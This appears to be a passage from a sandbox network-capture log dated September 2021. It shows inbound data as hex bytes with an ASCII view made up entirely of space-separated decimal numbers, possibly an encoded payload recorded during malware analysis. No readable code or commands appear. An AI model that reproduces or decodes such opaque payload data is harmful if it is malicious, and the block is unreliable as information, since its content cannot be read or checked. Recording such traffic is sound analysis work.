                                                                                              2021-09-27 18:28:01 UTC3668INData Raw: 20 33 37 20 37 35 20 37 36 20 30 20 37 20 31 35 20 31 33 20 35 30 20 32 31 20 31 30 35 20 33 20 34 20 32 34 20 35 34 20 31 32 37 20 38 39 20 37 20 39 37 20 35 33 20 38 36 20 32 20 38 35 20 31 37 20 31 32 34 20 39 20 31 31 37 20 31 31 33 20 35 36 20 36 30 20 36 35 20 33 37 20 36 35 20 39 39 20 31 33 20 31 35 20 35 34 20 31 31 39 20 37 39 20 34 20 38 20 36 34 20 39 35 20 31 30 35 20 32 32 20 31 30 30 20 31 31 20 30 20 35 35 20 33 30 20 33 32 20 31 32 33 20 31 30 36 20 31 30 34 20 36 34 20 31 30 33 20 32 36 20 33 37 20 33 33 20 33 35 20 36 20 38 37 20 31 35 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 36 35 20 30 20 39 34 20 33 20 31 20 31 30 30 20 37 30 20 35 35 20 34 32 20 38 20 39 31 20 31 30 30 20 31 31 20 31 31 39 20 35 39 20 36 31 20 32 36 20 35 37
                                                                                              Data Ascii: 37 75 76 0 7 15 13 50 21 105 3 4 24 54 127 89 7 97 53 86 2 85 17 124 9 117 113 56 60 65 37 65 99 13 15 54 119 79 4 8 64 95 105 22 100 11 0 55 30 32 123 106 104 64 103 26 37 33 35 6 87 15 11 84 81 72 28 65 0 94 3 1 100 70 55 42 8 91 100 11 119 59 61 26 57
                                                                                              2021-09-27 18:28:01 UTC3684INData Raw: 32 20 33 33 20 39 31 20 38 36 20 39 36 20 36 37 20 32 35 20 34 39 20 37 20 39 34 20 36 38 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 32 36 20 36 35 20 39 35 20 31 20 31 30 37 20 36 39 20 39 34 20 32 20 36 30 20 32 34 20 38 31 20 31 32 20 31 37 20 37 20 39 33 20 39 34 20 36 37 20 35 33 20 32 32 20 33 20 33 33 20 34 39 20 31 35 20 31 33 20 35 30 20 32 31 20 31 30 35 20 33 20 32 39 20 32 36 20 39 20 31 32 34 20 38 31 20 31 30 39 20 39 30 20 36 30 20 36 20 30 20 32 20 39 20 37 31 20 31 32 32 20 31 32 31 20 33 20 36 32 20 36 35 20 35 35 20 31 34 20 35 34 20 36 20 37 32 20 37 31 20 33 20 35 30 20 34 33 20 36 34 20 35 33 20 32 34 20 31 31 36 20 39 32 20 38 35 20 37 36 20 36 33 20 36 33 20 36 38 20 34 36 20 32 33 20 37 35 20 36 20 31 32 33 20 31 31 39 20 31
                                                                                              Data Ascii: 2 33 91 86 96 67 25 49 7 94 68 15 48 17 11 37 26 65 95 1 107 69 94 2 60 24 81 12 17 7 93 94 67 53 22 3 33 49 15 13 50 21 105 3 29 26 9 124 81 109 90 60 6 0 2 9 71 122 121 3 62 65 55 14 54 6 72 71 3 50 43 64 53 24 116 92 85 76 63 63 68 46 23 75 6 123 119 1
                                                                                              2021-09-27 18:28:01 UTC3700INData Raw: 20 32 34 20 38 37 20 31 32 34 20 36 34 20 31 30 38 20 34 35 20 36 35 20 32 32 20 32 39 20 33 39 20 39 37 20 39 31 20 35 20 38 32 20 35 39 20 37 34 20 33 35 20 35 39 20 34 20 39 30 20 38 37 20 31 35 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 36 30 20 31 30 39 20 39 37 20 31 30 39 20 31 30 30 20 34 38 20 33 39 20 32 34 20 35 30 20 37 20 31 32 30 20 37 20 31 30 30 20 38 33 20 32 20 35 20 33 32 20 32 38 20 33 34 20 31 30 36 20 38 32 20 31 31 35 20 31 31 20 31 30 35 20 31 31 34 20 38 36 20 38 30 20 31 20 31 31 37 20 39 30 20 36 36 20 36 20 32 20 31 36 20 36 37 20 38 20 32 32 20 31 32 35 20 31 32 36 20 36 39 20 31 31 39 20 32 36 20 32 35 20 32 32 20 33 38 20 32 20 31 32 37 20 31 30 30 20 38 39 20 31 32 37 20 32 32 20 31 30 20 36 33 20 32 37 20 32 20 31 31
                                                                                              Data Ascii: 24 87 124 64 108 45 65 22 29 39 97 91 5 82 59 74 35 59 4 90 87 15 11 84 81 72 28 60 109 97 109 100 48 39 24 50 7 120 7 100 83 2 5 32 28 34 106 82 115 11 105 114 86 80 1 117 90 66 6 2 16 67 8 22 125 126 69 119 26 25 22 38 2 127 100 89 127 22 10 63 27 2 11
                                                                                              2021-09-27 18:28:01 UTC3716INData Raw: 30 20 31 31 36 20 35 30 20 33 20 37 20 31 30 20 33 20 39 33 20 38 20 37 32 20 38 33 20 36 30 20 33 34 20 31 38 20 38 30 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 34 35 20 31 30 20 35 20 31 31 20 33 31 20 39 34 20 31 32 34 20 31 30 33 20 39 34 20 32 35 20 34 20 35 31 20 35 37 20 35 32 20 31 31 39 20 32 20 39 30 20 31 30 35 20 33 39 20 31 31 20 33 20 36 30 20 37 37 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 36 31 20 36 32 20 36 32 20 32 39 20 31 30 37 20 31 31 37 20 36 20 31 20 34 20 36 34 20 31 35 20 37 33 20 33 37 20 31 30 36 20 36 35 20 31 31 37 20 31 31 35 20 30 20 33 30 20 32 37 20 31 31 20 32 33 20 31 35 20 31 33 20 35 30 20 32 31 20 31 30 35 20 33 20 32 30 20 31 31 20 31 30 20 39 39 20 38 33 20 31 32 37 20 31 31 37 20 33 31 20 36 36 20 31
                                                                                              Data Ascii: 0 116 50 3 7 10 3 93 8 72 83 60 34 18 80 77 50 19 15 71 45 10 5 11 31 94 124 103 94 25 4 51 57 52 119 2 90 105 39 11 3 60 77 15 48 17 11 37 61 62 62 29 107 117 6 1 4 64 15 73 37 106 65 117 115 0 30 27 11 23 15 13 50 21 105 3 20 11 10 99 83 127 117 31 66 1
                                                                                              2021-09-27 18:28:01 UTC3732INData Raw: 31 31 39 20 35 36 20 33 30 20 35 35 20 32 30 20 34 20 38 37 20 36 37 20 35 30 20 31 31 37 20 35 39 20 33 31 20 35 20 31 32 20 32 20 38 37 20 34 38 20 31 31 37 20 38 33 20 33 32 20 35 32 20 32 36 20 31 20 32 30 20 38 37 20 36 36 20 39 38 20 38 37 20 33 32 20 32 36 20 31 31 37 20 34 32 20 32 31 20 37 30 20 31 31 38 20 39 31 20 39 30 20 34 39 20 31 20 31 31 37 20 34 32 20 32 31 20 37 30 20 31 31 38 20 39 31 20 39 30 20 34 39 20 36 30 20 32 30 20 30 20 32 31 20 31 30 31 20 38 39 20 37 30 20 39 34 20 35 39 20 37 20 31 20 34 30 20 38 20 37 30 20 38 35 20 39 32 20 36 39 20 36 31 20 32 39 20 32 37 20 31 30 39 20 35 33 20 39 32 20 36 35 20 37 31 20 38 33 20 33 33 20 32 33 20 31 31 37 20 36 33 20 32 31 20 38 33 20 38 34 20 31 32 33 20 38 38 20 33 32 20 36 35 20 37
                                                                                              Data Ascii: 119 56 30 55 20 4 87 67 50 117 59 31 5 12 2 87 48 117 83 32 52 26 1 20 87 66 98 87 32 26 117 42 21 70 118 91 90 49 1 117 42 21 70 118 91 90 49 60 20 0 21 101 89 70 94 59 7 1 40 8 70 85 92 69 61 29 27 109 53 92 65 71 83 33 23 117 63 21 83 84 123 88 32 65 7
                                                                                              2021-09-27 18:28:01 UTC3748INData Raw: 32 30 20 35 32 20 34 38 20 35 31 20 35 35 20 37 30 20 32 34 30 20 31 36 34 20 31 30 35 20 31 31 32 20 35 30 20 33 34 20 39 31 20 34 38 20 31 31 36 20 31 31 35 20 31 31 36 20 31 32 37 20 32 34 33 20 35 35 20 35 34 20 31 38 20 35 35 20 38 35 20 39 36 20 32 34 37 20 31 31 36 20 31 31 38 20 33 39 20 33 34 20 31 37 38 20 31 35 39 20 38 35 20 31 32 34 20 31 32 37 20 31 32 30 20 39 38 20 31 37 38 20 31 36 39 20 34 38 20 33 39 20 32 31 33 20 38 33 20 31 30 30 20 34 35 20 31 31 37 20 35 33 20 34 39 20 33 35 20 31 38 32 20 32 34 30 20 31 31 39 20 31 31 37 20 31 30 39 20 39 38 20 31 37 39 20 32 35 33 20 35 35 20 32 32 20 38 34 20 39 36 20 32 34 36 20 39 36 20 39 36 20 35 33 20 35 30 20 33 39 20 33 39 20 32 31 32 20 32 31 35 20 31 31 39 20 39 39 20 31 30 38 20 33 39
                                                                                              Data Ascii: 20 52 48 51 55 70 240 164 105 112 50 34 91 48 116 115 116 127 243 55 54 18 55 85 96 247 116 118 39 34 178 159 85 124 127 120 98 178 169 48 39 213 83 100 45 117 53 49 35 182 240 119 117 109 98 179 253 55 22 84 96 246 96 96 53 50 39 39 212 215 119 99 108 39
                                                                                              2021-09-27 18:28:01 UTC3764INData Raw: 32 34 32 20 37 36 20 32 31 36 20 31 32 39 20 32 30 20 32 33 34 20 32 30 38 20 32 30 38 20 31 36 39 20 31 35 35 20 34 32 20 32 34 36 20 32 32 32 20 31 32 20 31 34 38 20 32 32 39 20 31 38 30 20 31 33 32 20 35 31 20 31 37 32 20 32 32 33 20 32 32 32 20 31 36 37 20 32 31 35 20 33 33 20 32 31 35 20 31 32 38 20 35 32 20 31 36 30 20 31 33 36 20 31 30 34 20 36 35 20 36 34 20 30 20 32 34 31 20 31 39 39 20 31 30 20 31 38 32 20 31 36 20 39 37 20 31 39 34 20 31 31 30 20 31 39 20 31 33 32 20 31 31 30 20 32 35 30 20 38 39 20 37 38 20 36 31 20 39 20 32 33 20 32 36 20 35 39 20 31 37 34 20 32 34 35 20 32 31 35 20 31 32 37 20 31 39 36 20 32 34 37 20 32 35 34 20 33 38 20 32 30 32 20 31 33 32 20 32 30 38 20 38 36 20 31 34 20 31 36 20 31 33 38 20 31 35 20 31 32 20 31 39 35 20
                                                                                              Data Ascii: 242 76 216 129 20 234 208 208 169 155 42 246 222 12 148 229 180 132 51 172 223 222 167 215 33 215 128 52 160 136 104 65 64 0 241 199 10 182 16 97 194 110 19 132 110 250 89 78 61 9 23 26 59 174 245 215 127 196 247 254 38 202 132 208 86 14 16 138 15 12 195
                                                                                              2021-09-27 18:28:01 UTC3780INData Raw: 31 34 34 20 31 33 33 20 31 32 36 20 31 33 31 20 39 36 20 33 39 20 32 35 31 20 31 35 30 20 32 31 20 31 34 34 20 34 39 20 31 35 36 20 32 34 35 20 31 35 38 20 31 35 37 20 31 33 30 20 31 34 34 20 31 35 39 20 31 39 33 20 33 31 20 31 35 34 20 34 38 20 31 39 30 20 31 33 37 20 32 34 39 20 31 39 35 20 31 31 36 20 31 39 31 20 31 33 38 20 31 39 38 20 31 31 38 20 34 31 20 32 33 20 32 34 35 20 35 20 31 37 37 20 32 36 20 31 37 36 20 33 20 39 38 20 35 32 20 38 33 20 31 31 36 20 34 32 20 32 35 31 20 38 31 20 32 32 30 20 32 35 20 31 37 37 20 31 38 33 20 34 37 20 31 38 33 20 31 37 34 20 32 38 20 31 35 35 20 32 31 20 32 33 34 20 31 38 33 20 32 31 34 20 31 31 33 20 32 30 37 20 32 33 34 20 39 38 20 32 31 34 20 39 31 20 34 33 20 32 35 20 31 30 33 20 31 39 31 20 32 31 37 20 31
                                                                                              Data Ascii: 144 133 126 131 96 39 251 150 21 144 49 156 245 158 157 130 144 159 193 31 154 48 190 137 249 195 116 191 138 198 118 41 23 245 5 177 26 176 3 98 52 83 116 42 251 81 220 25 177 183 47 183 174 28 155 21 234 183 214 113 207 234 98 214 91 43 25 103 191 217 1
                                                                                              2021-09-27 18:28:01 UTC3796INData Raw: 20 31 35 35 20 31 38 31 20 31 32 20 32 35 35 20 31 30 34 20 31 33 30 20 31 39 36 20 38 20 31 35 36 20 36 33 20 32 30 33 20 32 31 32 20 31 33 31 20 31 38 37 20 39 31 20 39 32 20 31 39 33 20 32 33 30 20 31 34 30 20 32 35 33 20 31 34 38 20 31 32 20 31 39 32 20 32 31 35 20 31 36 32 20 32 32 35 20 32 34 30 20 32 32 30 20 36 37 20 34 39 20 33 37 20 33 20 31 34 31 20 32 30 31 20 35 31 20 32 33 35 20 34 39 20 31 37 32 20 36 35 20 39 35 20 31 37 37 20 31 30 39 20 36 36 20 35 39 20 31 37 34 20 31 34 36 20 31 34 36 20 35 38 20 39 37 20 31 36 36 20 33 32 20 32 33 34 20 31 34 38 20 31 32 35 20 39 32 20 31 36 38 20 34 36 20 32 34 39 20 39 39 20 31 35 36 20 31 36 39 20 33 38 20 32 31 31 20 32 37 20 32 35 30 20 32 31 31 20 31 37 34 20 31 31 31 20 31 39 35 20 31 35 33 20
                                                                                              Data Ascii: 155 181 12 255 104 130 196 8 156 63 203 212 131 187 91 92 193 230 140 253 148 12 192 215 162 225 240 220 67 49 37 3 141 201 51 235 49 172 65 95 177 109 66 59 174 146 146 58 97 166 32 234 148 125 92 168 46 249 99 156 169 38 211 27 250 211 174 111 195 153
                                                                                              2021-09-27 18:28:01 UTC3812INData Raw: 20 31 33 33 20 31 38 30 20 31 30 36 20 39 38 20 31 38 36 20 37 33 20 32 31 32 20 31 36 33 20 38 30 20 32 33 32 20 35 32 20 31 31 30 20 34 20 31 33 20 32 30 34 20 31 32 30 20 36 30 20 31 36 30 20 32 30 35 20 31 35 20 31 32 34 20 32 34 36 20 32 33 37 20 32 32 35 20 32 32 38 20 36 32 20 32 35 30 20 33 34 20 33 33 20 31 33 38 20 31 35 39 20 31 36 35 20 34 39 20 36 31 20 32 35 32 20 31 39 39 20 30 20 31 38 34 20 31 31 37 20 33 34 20 32 32 30 20 31 39 39 20 37 35 20 32 34 30 20 32 32 38 20 32 34 30 20 37 37 20 31 39 32 20 37 32 20 33 38 20 32 31 30 20 32 31 35 20 31 33 37 20 31 34 35 20 38 30 20 38 32 20 31 32 33 20 32 32 20 31 31 35 20 31 36 32 20 31 33 34 20 39 37 20 31 36 36 20 31 36 33 20 31 33 37 20 31 37 35 20 34 30 20 35 37 20 32 33 33 20 35 36 20 37 39
                                                                                              Data Ascii: 133 180 106 98 186 73 212 163 80 232 52 110 4 13 204 120 60 160 205 15 124 246 237 225 228 62 250 34 33 138 159 165 49 61 252 199 0 184 117 34 220 199 75 240 228 240 77 192 72 38 210 215 137 145 80 82 123 22 115 162 134 97 166 163 137 175 40 57 233 56 79
                                                                                              2021-09-27 18:28:01 UTC3828INData Raw: 20 31 32 33 20 31 33 34 20 31 33 32 20 35 39 20 31 34 33 20 35 36 20 39 36 20 33 37 20 31 38 37 20 31 34 31 20 34 38 20 32 31 39 20 31 32 38 20 34 31 20 31 33 38 20 38 36 20 31 30 33 20 35 38 20 31 36 39 20 31 31 36 20 31 31 38 20 31 32 20 34 31 20 31 31 38 20 32 34 33 20 32 34 33 20 34 31 20 31 31 31 20 38 31 20 32 31 34 20 31 33 39 20 38 35 20 31 30 31 20 35 34 20 39 38 20 31 35 31 20 31 37 32 20 32 30 32 20 31 32 20 31 32 32 20 37 30 20 39 37 20 31 31 39 20 31 38 33 20 35 30 20 38 37 20 32 35 20 31 33 38 20 38 39 20 32 30 30 20 31 30 35 20 31 37 37 20 31 37 34 20 37 38 20 34 39 20 32 30 35 20 32 31 34 20 31 39 20 32 34 30 20 34 31 20 34 30 20 39 20 35 39 20 32 35 33 20 31 37 30 20 32 34 30 20 36 32 20 32 30 32 20 37 32 20 31 37 35 20 32 20 39 35 20 34
                                                                                              Data Ascii: 123 134 132 59 143 56 96 37 187 141 48 219 128 41 138 86 103 58 169 116 118 12 41 118 243 243 41 111 81 214 139 85 101 54 98 151 172 202 12 122 70 97 119 183 50 87 25 138 89 200 105 177 174 78 49 205 214 19 240 41 40 9 59 253 170 240 62 202 72 175 2 95 4
                                                                                              2021-09-27 18:28:01 UTC3844INData Raw: 20 32 37 20 31 33 20 36 38 20 33 39 20 31 30 37 20 31 35 20 31 35 37 20 31 38 35 20 34 37 20 32 31 37 20 36 30 20 31 33 30 20 31 33 39 20 31 39 36 20 32 32 37 20 35 38 20 34 38 20 31 33 39 20 32 31 34 20 37 33 20 34 32 20 31 36 35 20 31 39 33 20 32 30 20 31 33 32 20 30 20 33 33 20 32 30 31 20 31 31 20 32 31 30 20 30 20 31 35 20 31 37 20 32 32 37 20 36 39 20 32 33 37 20 39 33 20 31 32 35 20 32 35 31 20 35 32 20 32 36 20 32 35 32 20 33 31 20 31 33 31 20 32 30 39 20 39 39 20 33 20 31 36 31 20 34 38 20 31 39 33 20 32 34 20 38 33 20 32 33 30 20 31 31 34 20 37 32 20 31 38 38 20 31 34 37 20 32 33 20 31 35 20 39 39 20 32 30 30 20 31 33 33 20 31 30 32 20 31 38 33 20 32 30 33 20 32 31 37 20 35 33 20 31 36 38 20 37 36 20 38 32 20 31 38 20 31 35 30 20 34 35 20 31 33
                                                                                              Data Ascii: 27 13 68 39 107 15 157 185 47 217 60 130 139 196 227 58 48 139 214 73 42 165 193 20 132 0 33 201 11 210 0 15 17 227 69 237 93 125 251 52 26 252 31 131 209 99 3 161 48 193 24 83 230 114 72 188 147 23 15 99 200 133 102 183 203 217 53 168 76 82 18 150 45 13
                                                                                              2021-09-27 18:28:01 UTC3860INData Raw: 20 37 36 20 31 32 35 20 36 35 20 32 33 32 20 31 36 20 38 38 20 33 34 20 32 33 31 20 32 31 39 20 31 34 37 20 34 35 20 31 38 35 20 38 38 20 33 32 20 31 38 20 32 20 36 34 20 39 39 20 34 34 20 33 31 20 34 39 20 31 35 38 20 33 31 20 31 31 38 20 32 31 31 20 37 33 20 32 32 36 20 31 37 20 32 33 34 20 31 31 31 20 33 36 20 31 33 31 20 37 38 20 32 32 31 20 37 20 31 38 30 20 35 35 20 35 20 31 36 39 20 31 31 20 36 38 20 31 32 36 20 32 34 30 20 37 35 20 31 38 38 20 31 35 33 20 32 20 31 31 20 31 34 31 20 32 31 36 20 35 37 20 31 39 36 20 37 20 38 38 20 32 35 32 20 32 32 30 20 31 36 37 20 31 30 34 20 32 32 34 20 31 38 34 20 35 31 20 32 33 35 20 36 37 20 39 38 20 31 34 31 20 33 30 20 31 32 34 20 32 30 38 20 31 33 36 20 32 38 20 34 31 20 32 33 33 20 31 32 31 20 31 37 37 20
                                                                                              Data Ascii: 76 125 65 232 16 88 34 231 219 147 45 185 88 32 18 2 64 99 44 31 49 158 31 118 211 73 226 17 234 111 36 131 78 221 7 180 55 5 169 11 68 126 240 75 188 153 2 11 141 216 57 196 7 88 252 220 167 104 224 184 51 235 67 98 141 30 124 208 136 28 41 233 121 177
                                                                                              2021-09-27 18:28:01 UTC3876INData Raw: 20 31 32 31 20 32 35 35 20 36 33 20 31 36 30 20 34 34 20 32 31 39 20 32 34 33 20 36 39 20 31 33 31 20 36 33 20 39 37 20 31 33 39 20 31 38 34 20 31 39 31 20 38 30 20 35 39 20 31 34 31 20 32 33 35 20 35 35 20 32 35 35 20 31 31 35 20 31 31 37 20 34 37 20 31 32 33 20 31 30 39 20 37 31 20 36 32 20 31 35 32 20 33 30 20 31 37 35 20 31 37 20 39 32 20 31 38 30 20 31 35 31 20 32 34 38 20 31 30 20 35 30 20 31 35 32 20 31 33 37 20 31 33 34 20 32 31 37 20 35 33 20 32 35 30 20 31 30 30 20 31 38 34 20 32 31 32 20 31 37 38 20 32 33 39 20 31 37 37 20 35 20 32 30 32 20 34 33 20 31 30 36 20 35 30 20 31 31 38 20 32 33 20 32 33 34 20 32 35 35 20 31 32 20 33 34 20 31 32 30 20 31 31 31 20 32 33 36 20 31 33 33 20 32 30 20 32 32 39 20 34 37 20 39 31 20 37 32 20 31 35 35 20 36 39
                                                                                              Data Ascii: 121 255 63 160 44 219 243 69 131 63 97 139 184 191 80 59 141 235 55 255 115 117 47 123 109 71 62 152 30 175 17 92 180 151 248 10 50 152 137 134 217 53 250 100 184 212 178 239 177 5 202 43 106 50 118 23 234 255 12 34 120 111 236 133 20 229 47 91 72 155 69
                                                                                              2021-09-27 18:28:01 UTC3892INData Raw: 20 31 30 39 20 31 34 34 20 32 31 38 20 34 38 20 34 32 20 31 31 37 20 34 38 20 31 31 30 20 31 39 32 20 39 39 20 31 31 38 20 31 37 34 20 31 35 36 20 32 31 31 20 32 30 30 20 31 30 36 20 31 35 32 20 31 31 39 20 35 30 20 35 36 20 35 35 20 32 34 35 20 34 20 31 35 32 20 32 20 31 30 37 20 39 32 20 36 31 20 39 39 20 34 36 20 31 38 20 34 31 20 31 38 39 20 34 34 20 32 35 35 20 36 20 32 30 39 20 32 30 33 20 32 30 20 38 31 20 32 30 31 20 38 30 20 31 39 32 20 34 31 20 31 33 37 20 39 32 20 31 32 31 20 36 38 20 31 32 30 20 32 37 20 32 34 31 20 31 30 38 20 31 38 20 32 35 33 20 31 39 33 20 39 34 20 31 39 35 20 39 33 20 32 33 20 36 32 20 32 33 33 20 32 30 33 20 32 34 37 20 31 30 31 20 32 32 31 20 31 30 35 20 31 32 39 20 38 37 20 32 33 37 20 31 30 37 20 32 30 37 20 31 39 30
                                                                                              Data Ascii: 109 144 218 48 42 117 48 110 192 99 118 174 156 211 200 106 152 119 50 56 55 245 4 152 2 107 92 61 99 46 18 41 189 44 255 6 209 203 20 81 201 80 192 41 137 92 121 68 120 27 241 108 18 253 193 94 195 93 23 62 233 203 247 101 221 105 129 87 237 107 207 190
                                                                                              2021-09-27 18:28:01 UTC3908INData Raw: 20 39 32 20 32 36 20 34 20 38 33 20 36 36 20 32 34 30 20 31 30 32 20 31 35 38 20 31 35 38 20 30 20 31 31 34 20 32 34 37 20 32 35 20 32 31 33 20 32 32 37 20 31 33 33 20 32 31 36 20 32 35 35 20 32 32 20 34 39 20 32 34 35 20 31 33 35 20 37 20 32 31 35 20 31 35 36 20 38 31 20 32 30 35 20 31 35 34 20 39 38 20 31 30 31 20 31 37 20 39 34 20 39 33 20 33 33 20 35 39 20 31 39 30 20 31 32 32 20 36 38 20 32 31 34 20 32 30 20 31 38 37 20 32 31 34 20 37 37 20 33 38 20 31 33 37 20 31 31 34 20 31 35 30 20 32 35 33 20 31 35 37 20 32 31 20 31 39 39 20 33 20 31 37 37 20 35 38 20 37 37 20 32 31 39 20 31 32 36 20 32 34 39 20 34 20 32 20 31 38 34 20 31 39 32 20 37 20 31 33 32 20 39 35 20 31 37 38 20 31 34 33 20 39 35 20 37 20 31 31 20 31 34 35 20 32 34 33 20 31 34 20 31 31 32
                                                                                              Data Ascii: 92 26 4 83 66 240 102 158 158 0 114 247 25 213 227 133 216 255 22 49 245 135 7 215 156 81 205 154 98 101 17 94 93 33 59 190 122 68 214 20 187 214 77 38 137 114 150 253 157 21 199 3 177 58 77 219 126 249 4 2 184 192 7 132 95 178 143 95 7 11 145 243 14 112
                                                                                              2021-09-27 18:28:01 UTC3924INData Raw: 20 32 30 34 20 31 34 32 20 31 37 32 20 31 35 36 20 31 38 30 20 32 33 33 20 31 35 34 20 36 32 20 32 34 20 31 38 33 20 31 37 31 20 32 35 33 20 31 35 39 20 39 38 20 31 35 31 20 31 38 20 35 36 20 32 35 34 20 32 30 30 20 32 34 37 20 34 38 20 31 35 31 20 32 34 35 20 38 31 20 38 38 20 33 30 20 31 38 32 20 32 33 36 20 31 39 32 20 31 38 32 20 32 30 32 20 38 20 31 30 35 20 31 32 38 20 39 30 20 31 35 34 20 32 34 32 20 32 34 36 20 32 35 32 20 31 36 32 20 32 35 32 20 31 20 31 35 32 20 32 30 36 20 34 35 20 39 39 20 31 32 37 20 31 34 35 20 32 31 33 20 31 37 20 32 32 39 20 32 31 32 20 32 31 39 20 39 36 20 32 33 37 20 37 38 20 37 30 20 32 30 37 20 33 35 20 31 38 20 32 20 31 34 33 20 38 36 20 32 30 34 20 31 33 32 20 38 39 20 31 32 20 31 37 37 20 32 31 37 20 31 37 33 20 31
                                                                                              Data Ascii: 204 142 172 156 180 233 154 62 24 183 171 253 159 98 151 18 56 254 200 247 48 151 245 81 88 30 182 236 192 182 202 8 105 128 90 154 242 246 252 162 252 1 152 206 45 99 127 145 213 17 229 212 219 96 237 78 70 207 35 18 2 143 86 204 132 89 12 177 217 173 1
                                                                                              2021-09-27 18:28:01 UTC3940INData Raw: 32 20 31 34 31 20 31 36 34 20 34 30 20 31 39 35 20 37 35 20 31 30 20 33 33 20 32 30 30 20 32 32 37 20 32 39 20 38 37 20 37 20 31 36 20 32 35 33 20 31 32 38 20 31 31 36 20 31 37 32 20 31 33 39 20 36 32 20 35 32 20 35 37 20 31 38 31 20 32 33 31 20 38 35 20 32 31 31 20 31 30 33 20 39 20 31 36 33 20 31 34 34 20 32 33 30 20 31 39 30 20 31 31 30 20 32 31 20 39 20 31 30 32 20 39 20 31 38 35 20 32 31 36 20 31 32 20 32 33 20 34 33 20 36 38 20 31 35 34 20 31 36 31 20 38 32 20 31 38 20 36 32 20 34 34 20 32 31 20 31 39 35 20 31 37 34 20 31 34 39 20 31 36 37 20 32 33 37 20 31 34 35 20 31 30 33 20 31 36 30 20 31 20 31 33 33 20 31 36 39 20 32 32 36 20 31 30 38 20 31 30 36 20 31 36 38 20 32 31 33 20 31 39 35 20 38 33 20 34 30 20 33 20 32 35 30 20 34 20 31 31 37 20 31 37
                                                                                              Data Ascii: 2 141 164 40 195 75 10 33 200 227 29 87 7 16 253 128 116 172 139 62 52 57 181 231 85 211 103 9 163 144 230 190 110 21 9 102 9 185 216 12 23 43 68 154 161 82 18 62 44 21 195 174 149 167 237 145 103 160 1 133 169 226 108 106 168 213 195 83 40 3 250 4 117 17
                                                                                              2021-09-27 18:28:01 UTC3956INData Raw: 20 33 35 20 31 32 39 20 31 30 20 34 39 20 31 32 37 20 31 35 39 20 35 30 20 31 38 36 20 32 34 39 20 32 32 20 32 32 30 20 32 31 38 20 31 39 36 20 37 36 20 31 34 33 20 31 33 38 20 32 32 37 20 32 33 39 20 31 30 34 20 38 30 20 39 36 20 31 39 34 20 31 34 20 31 39 30 20 31 35 30 20 31 33 31 20 31 38 33 20 32 33 35 20 38 37 20 35 33 20 31 39 20 32 35 33 20 35 32 20 31 32 36 20 31 39 39 20 33 20 37 36 20 32 35 30 20 31 35 20 32 33 35 20 35 20 32 33 37 20 31 35 20 31 37 33 20 32 33 34 20 32 34 38 20 38 39 20 34 37 20 31 38 39 20 31 38 33 20 38 34 20 32 32 20 32 34 32 20 31 35 39 20 34 30 20 31 37 20 36 37 20 31 37 37 20 31 38 38 20 36 33 20 38 33 20 31 38 31 20 36 30 20 32 34 32 20 37 35 20 31 32 36 20 35 37 20 32 32 38 20 31 39 39 20 31 31 37 20 31 32 34 20 31 38
                                                                                              Data Ascii: 35 129 10 49 127 159 50 186 249 22 220 218 196 76 143 138 227 239 104 80 96 194 14 190 150 131 183 235 87 53 19 253 52 126 199 3 76 250 15 235 5 237 15 173 234 248 89 47 189 183 84 22 242 159 40 17 67 177 188 63 83 181 60 242 75 126 57 228 199 117 124 18
                                                                                              2021-09-27 18:28:01 UTC3972INData Raw: 20 31 30 30 20 31 33 37 20 31 30 32 20 31 37 31 20 31 38 38 20 34 37 20 31 35 35 20 39 30 20 32 30 31 20 31 38 33 20 31 30 20 31 34 39 20 31 36 33 20 31 38 36 20 31 33 32 20 31 30 20 33 37 20 32 35 20 31 38 37 20 31 32 20 35 20 32 31 35 20 33 34 20 34 31 20 38 31 20 34 31 20 36 33 20 31 30 20 38 37 20 31 20 31 34 38 20 32 31 37 20 32 32 36 20 31 31 35 20 31 33 32 20 33 36 20 32 34 20 36 38 20 31 37 34 20 31 31 38 20 31 36 39 20 32 34 36 20 32 33 34 20 31 37 33 20 31 39 36 20 36 34 20 31 37 32 20 38 33 20 31 37 39 20 36 36 20 36 31 20 32 34 34 20 31 38 39 20 33 36 20 31 37 36 20 33 20 32 30 36 20 35 31 20 32 39 20 32 32 32 20 33 32 20 37 39 20 31 37 31 20 32 35 31 20 31 36 39 20 33 37 20 39 38 20 32 34 37 20 31 31 38 20 31 35 30 20 32 34 39 20 32 33 36 20
                                                                                              Data Ascii: 100 137 102 171 188 47 155 90 201 183 10 149 163 186 132 10 37 25 187 12 5 215 34 41 81 41 63 10 87 1 148 217 226 115 132 36 24 68 174 118 169 246 234 173 196 64 172 83 179 66 61 244 189 36 176 3 206 51 29 222 32 79 171 251 169 37 98 247 118 150 249 236
                                                                                              2021-09-27 18:28:01 UTC3988INData Raw: 31 20 32 33 37 20 37 34 20 34 34 20 32 32 34 20 38 30 20 31 37 34 20 31 32 37 20 31 32 33 20 31 33 32 20 38 33 20 31 35 32 20 32 32 32 20 32 33 36 20 31 36 30 20 31 38 32 20 31 32 31 20 34 37 20 32 32 38 20 35 30 20 31 34 35 20 31 38 32 20 37 33 20 33 38 20 39 20 37 37 20 32 35 32 20 31 30 33 20 34 37 20 32 35 35 20 32 38 20 31 32 39 20 36 33 20 31 20 32 32 20 32 30 38 20 31 36 38 20 34 39 20 32 33 37 20 31 35 37 20 32 31 33 20 32 31 20 36 30 20 31 36 36 20 32 35 32 20 32 35 30 20 33 30 20 33 20 31 34 34 20 31 32 31 20 31 32 32 20 33 20 32 34 38 20 37 20 31 32 30 20 31 31 20 35 32 20 31 32 20 32 32 30 20 31 39 32 20 32 32 32 20 31 31 35 20 32 20 33 31 20 31 34 39 20 31 38 32 20 32 30 36 20 31 31 39 20 31 38 37 20 32 33 20 33 38 20 31 35 35 20 34 30 20 31
                                                                                              Data Ascii: 1 237 74 44 224 80 174 127 123 132 83 152 222 236 160 182 121 47 228 50 145 182 73 38 9 77 252 103 47 255 28 129 63 1 22 208 168 49 237 157 213 21 60 166 252 250 30 3 144 121 122 3 248 7 120 11 52 12 220 192 222 115 2 31 149 182 206 119 187 23 38 155 40 1
